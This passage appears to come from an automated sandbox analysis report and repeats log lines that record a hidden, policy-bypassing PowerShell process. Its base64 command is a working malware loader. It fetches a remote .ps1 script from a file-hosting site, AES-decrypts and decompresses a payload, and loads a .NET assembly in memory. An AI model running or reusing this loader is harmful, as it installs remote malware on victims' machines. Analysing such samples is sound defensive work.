kkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRk